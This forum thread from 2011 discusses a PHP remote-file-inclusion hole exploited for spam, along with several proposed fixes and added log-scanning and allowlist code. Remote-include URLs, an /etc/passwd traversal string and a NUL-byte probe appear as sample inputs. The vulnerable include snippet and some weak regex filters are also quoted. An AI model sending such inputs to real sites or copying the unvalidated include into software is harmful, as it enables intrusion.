Remix919
11-22-2011, 02:31 AM
OK, so for the past 2 weeks I kept having some idiot from Malaysia somehow posting a file into my website directory and sending mass spam using my server. This issue is isolated to just 1 account on the server, and each time I tracked the file down using the mail headers and deleted it, but he just kept doing it. Now I think I FINALLY figured out how he's doing it and would like some advice as to whether or not this is how he's doing it and, if so, how I can stop it.
So, that being said, I have a simple piece of PHP code that basically allows me to change the page that shows up in the main content area of the website. Well, I think this is also how he's been somehow injecting files into my website account, because I just realized that I can use ?view=http://domain.com/hack as the file included. Do you guys think this is how he's been getting in, and how can I stop this from happening?
<?php
// The request parameter is used unvalidated as the include target.
$view = $_REQUEST['view'];
if($view == "") {
    $view = "main";
}
include "$view.php";
?>
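To check whether the view parameter really is the entry point, the web server's access log is the first place to look. The script below is an added example, not code from the thread: it walks a few constructed Apache-style log lines (the addresses and hostnames are placeholders) and flags any request whose decoded view value carries a URL scheme, a protocol-relative "//", a directory-traversal sequence or a NUL byte, which are the shapes that turn include "$view.php" into a remote or local file inclusion.

```php
<?php
// Added example (not from the thread). Log lines are constructed; the
// addresses and hostnames are placeholders.
$logLines = [
    '203.0.113.5 - - [21/Nov/2011:22:14:03 +0000] "GET /index.php?view=main HTTP/1.1" 200 5120',
    '203.0.113.5 - - [21/Nov/2011:22:14:09 +0000] "GET /index.php?view=gallery HTTP/1.1" 200 8810',
    '198.51.100.9 - - [21/Nov/2011:23:02:41 +0000] "GET /index.php?view=http://attacker.example/hack HTTP/1.1" 200 412',
    '198.51.100.9 - - [21/Nov/2011:23:02:55 +0000] "GET /index.php?view=%2F%2Fattacker.example%2Fhack HTTP/1.1" 200 412',
    '198.51.100.9 - - [21/Nov/2011:23:03:10 +0000] "GET /index.php?view=../../etc/passwd%00 HTTP/1.1" 200 1901',
];

/**
 * Return the URL-decoded "view" parameter from one log line, or null when
 * the request has no such parameter.
 */
function extractViewParam(string $line): ?string
{
    // Pull the request target out of the quoted "METHOD /path?query HTTP/x.y" field.
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return null;
    }
    parse_str(substr($m[1], $qpos + 1), $params); // parse_str also URL-decodes
    return isset($params['view']) && is_string($params['view']) ? $params['view'] : null;
}

/**
 * Classify a "view" value as seen by include "$view.php".
 */
function classifyView(string $view): string
{
    // "scheme://host/..." or "//host/..." makes include() fetch a remote file
    // when allow_url_include is on.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $view) || substr($view, 0, 2) === '//') {
        return 'remote-include attempt';
    }
    // A NUL byte was historically used to cut off the appended ".php".
    if (strpos($view, "\0") !== false) {
        return 'null-byte truncation attempt';
    }
    // Any "../" or slash at all walks outside the intended pages directory.
    if (preg_match('#(^|/)\.\.(/|$)#', $view) || strpos($view, '/') !== false) {
        return 'path-traversal attempt';
    }
    return 'ok';
}

foreach ($logLines as $line) {
    $view = extractViewParam($line);
    if ($view === null) {
        continue;
    }
    $verdict = classifyView($view);
    if ($verdict !== 'ok') {
        // Print the client address with the verdict so the entry can be lined
        // up against the timestamps in the spam mail headers.
        $ip = strtok($line, ' ');
        printf("%-15s %-30s %s\n", $ip, $verdict, addcslashes($view, "\0..\37"));
    }
}
```

Run it over the real log with the sample array swapped for file($logfile) or a stream read; the two "main" and "gallery" requests pass silently, the other three are reported with their source address.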
myfayt
11-22-2011, 03:02 AM
Just to comment, it could be a bot putting the file there and sending emails from your website. They act like humans and run 24/7.
<?
$view = $_REQUEST['view'];
if($view == "") {
$view = "main";
}
include "$view.php";
?>
This is really insecure.
If you have to use this, do something like:
<?php
$view = $_REQUEST['view'];
if($view == "")
{
    $view = "main";
}
// Every part before the "\." is optional, so this rejects any value that
// contains a dot at all, which covers http://..., www.... and file.ext.
if(!preg_match('/(http)?\:?\/?\/?([w]+)?\./', $view))
{
    include "$view.php";
}
else
{
    echo "invalid.";
}
?>
Basically, that won't allow anything with http, www, or anything.whatever.
Remix919
11-22-2011, 03:06 AM
Just to comment, it could be a bot putting the file there and sending emails from your website. They act like humans and run 24/7.
A bot? What do you mean? At one point I did find a PHP shell script that, when accessed via a web browser, allowed them to view my FTP structure and upload files without having to log in first, but I figured they used the injection to get that file in there in the first place. I highly doubt they have my password, because it's highly secure and randomly generated, and I changed it after each incident.
Remix919
11-22-2011, 03:07 AM
<?
$view = $_REQUEST['view'];
if($view == "") {
$view = "main";
}
include "$view.php";
?>
this is really insecure..
if you have to use this do something like..
$view = $_REQUEST['view'];
if($view == "")
{
$view = "main";
}
if(!preg_match('/(http)/', $view))
{
include "$view.php";
}
Thanks Adee! Just what I was looking for :D
I edited my post.. that won't stop someone from doing site.com/file.php lol
tangoforce
11-22-2011, 03:21 AM
Easier still, use the full server path to your files (screws up http requests and lowers the CPU load by avoiding regular expressions):
<?php
$view = $_REQUEST['view'];
if($view == "") {
    $view = "main";
}
// The fixed prefix means the include target can no longer start with a URL.
include "path/to/yoursite.com/public_html/$view.php";
?>
Any further http://url.to/hacker.php requests will be screwed.
myfayt
11-22-2011, 03:41 AM
A bot? What do you mean? At one point I did find a PHP shell script that, when accessed via a web browser, allowed them to view my FTP structure and upload files without having to log in first, but I figured they used the injection to get that file in there in the first place. I highly doubt they have my password, because it's highly secure and randomly generated, and I changed it after each incident.
A bot is a script or program that crawls the web and posts spam and such. They are also called spiders, which research things.
http://en.wikipedia.org/wiki/Web_crawler
But some are also made strictly for spamming websites and sending mass emails.
Remix919
11-22-2011, 05:01 AM
Thanks for all the help, guys! I updated to your most recent code, Adee. I appreciate your help too, tango, but I do include some files below the root, so I'm not sure if that code will work?
XterM
11-22-2011, 08:11 AM
Try to validate $view and check that the file exists. I validate it in a few steps.
Define the valid pages in an array. With the valid pages defined, validation is easy.
Define a $default page too. The default page is used if $view is not valid. Don't forget to upload the default page.
$default = "main";
$valid = array("gallery","new");
// Quote the key and guard against a missing parameter (avoids a notice).
$view = isset($_GET['view']) ? $_GET['view'] : "";
$view = (!in_array($view, $valid, true)) ? $default : $view; // simple validation
Don't finish here. Next step, check that the file exists. We don't want any errors displayed, because hackers very much like looking at error messages.
$view = (file_exists($view.".php")) ? $view : $default;
Then include it:
include($view.".php");
No error will be displayed, even if you forgot to upload your "view" files.
I followed this tutorial:
http://explorecrew.org/portal.php?page=read&ID=196#[PHP] Pages Inclusion Hardening
In that tutorial, inclusion-injection prevention is fully explained.
I am sorry, my English is very bad.
Hope it helps.
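Putting the thread's suggestions together (tangoforce's fixed directory prefix, XterM's allowlist plus file_exists check) and going one step further with a realpath containment check, here is an added example that is not XterM's, tangoforce's or the linked tutorial's code. The pages directory, the page names and the probe values are assumptions; the script creates a throwaway directory under the system temp path so it runs stand-alone. In a real site you would call resolveView($_GET['view'] ?? null, __DIR__ . '/pages') and include the returned path.

```php
<?php
declare(strict_types=1);
// Added example (not XterM's, tangoforce's or the linked tutorial's code).
// The pages directory, page names and probe values below are assumptions.

const DEFAULT_PAGE = 'main';

// Public view names mapped to the only files that may ever be included.
const PAGE_MAP = [
    'main'    => 'main.php',
    'gallery' => 'gallery.php',
    'new'     => 'new.php',
];

/**
 * Resolve a requested view to an absolute path inside $pagesDir, or null.
 *  1. allowlist lookup: dots, slashes and URL schemes never get past this;
 *  2. realpath() must succeed, so a page that was never uploaded is rejected
 *     silently instead of surfacing an include warning;
 *  3. the resolved path must still start with the pages directory, which also
 *     catches a symlink inside it that points elsewhere.
 */
function resolveView($requested, string $pagesDir): ?string
{
    if ($requested === null || $requested === '') {
        $name = DEFAULT_PAGE;
    } elseif (!is_string($requested)) {
        return null;                       // e.g. ?view[]=x arrives as an array
    } else {
        $name = $requested;
    }
    if (!array_key_exists($name, PAGE_MAP)) {
        return null;
    }
    $base = realpath($pagesDir);
    $file = realpath($pagesDir . DIRECTORY_SEPARATOR . PAGE_MAP[$name]);
    if ($base === false || $file === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// ---- stand-alone demonstration using a throwaway pages directory ----------
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($pagesDir, 0700);
file_put_contents($pagesDir . '/main.php',    "<?php echo \"  [main page]\\n\";\n");
file_put_contents($pagesDir . '/gallery.php', "<?php echo \"  [gallery page]\\n\";\n");
// 'new' is listed in PAGE_MAP but deliberately not uploaded.

$probes = [
    null,                       // no parameter: default page
    'gallery',                  // allowed
    'new',                      // allowed name, file missing
    'http://domain.com/hack',   // the remote include from the first post
    '../../etc/passwd',         // traversal
    "gallery\0",                // NUL-byte truncation attempt
    ['gallery'],                // ?view[]=gallery
];

foreach ($probes as $view) {
    $path  = resolveView($view, $pagesDir);
    $label = $view === null ? 'NULL'
           : (is_string($view) ? '"' . addcslashes($view, "\0..\37") . '"' : gettype($view));
    printf("%-28s -> %s\n", $label, $path === null ? 'rejected' : basename($path));
    if ($path !== null) {
        include $path;
    }
}

array_map('unlink', glob($pagesDir . '/*.php'));
rmdir($pagesDir);
```

The allowlist does the real work; the realpath check is belt and braces for the case where the pages directory is later populated by something other than you. Because the missing "new" page is rejected before include() runs, no warning with the server path ever reaches the browser, which is the point XterM makes about not handing error messages to an attacker.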